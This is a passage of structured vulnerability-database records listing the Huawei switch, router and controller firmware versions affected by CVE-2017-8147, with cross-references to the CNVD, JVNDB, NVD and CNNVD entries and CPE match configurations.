            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r003c10",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v100r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v100r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r001c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r002c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v100r001c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v100r002c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v100r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v100r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r002c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r008c10",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37678",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-010631",
         },
         {
            db: "NVD",
            id: "CVE-2017-8147",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201711-982",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ac6005_firmware:v200r006c10spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ac6005:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ac6605_firmware:v200r006c10spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ac6605:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar1200_firmware:v200r005c20spc026t:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar1200_firmware:v200r005c10hp0581t:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar1200_firmware:v200r005c10cp0582t:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar1200:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar200_firmware:v200r005c20spc026t:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar200:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar3200_firmware:v200r005c20spc026t:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar3200:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_12800_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_12800_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_12800_firmware:v100r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_12800_firmware:v100r005c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_12800_firmware:v100r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:cloudengine_12800:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_5800_firmware:v100r005c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_5800_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_5800_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_5800_firmware:v100r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_5800_firmware:v100r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:cloudengine_5800:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_6800_firmware:v100r005c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_6800_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_6800_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_6800_firmware:v100r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_6800_firmware:v100r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:cloudengine_6800:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_7800_firmware:v100r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_7800_firmware:v100r005c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_7800_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_7800_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_7800_firmware:v100r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:cloudengine_7800:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_8800_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:cloudengine_8800_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:cloudengine_8800:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:e600_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:e600:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s1700_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s1700_firmware:v100r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s1700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s1700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r005c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r005c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r005c03:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v100r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v100r006c03:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v100r006c05:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r003c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r003c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r005c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r005c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r005c03:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v100r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v100r006c03:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r003c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v100r006c05:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r003c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v100r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v100r006c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r001c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v100r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v100r006c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r001c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r003c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r003c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r001c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r001c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r003c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r003c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r001c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
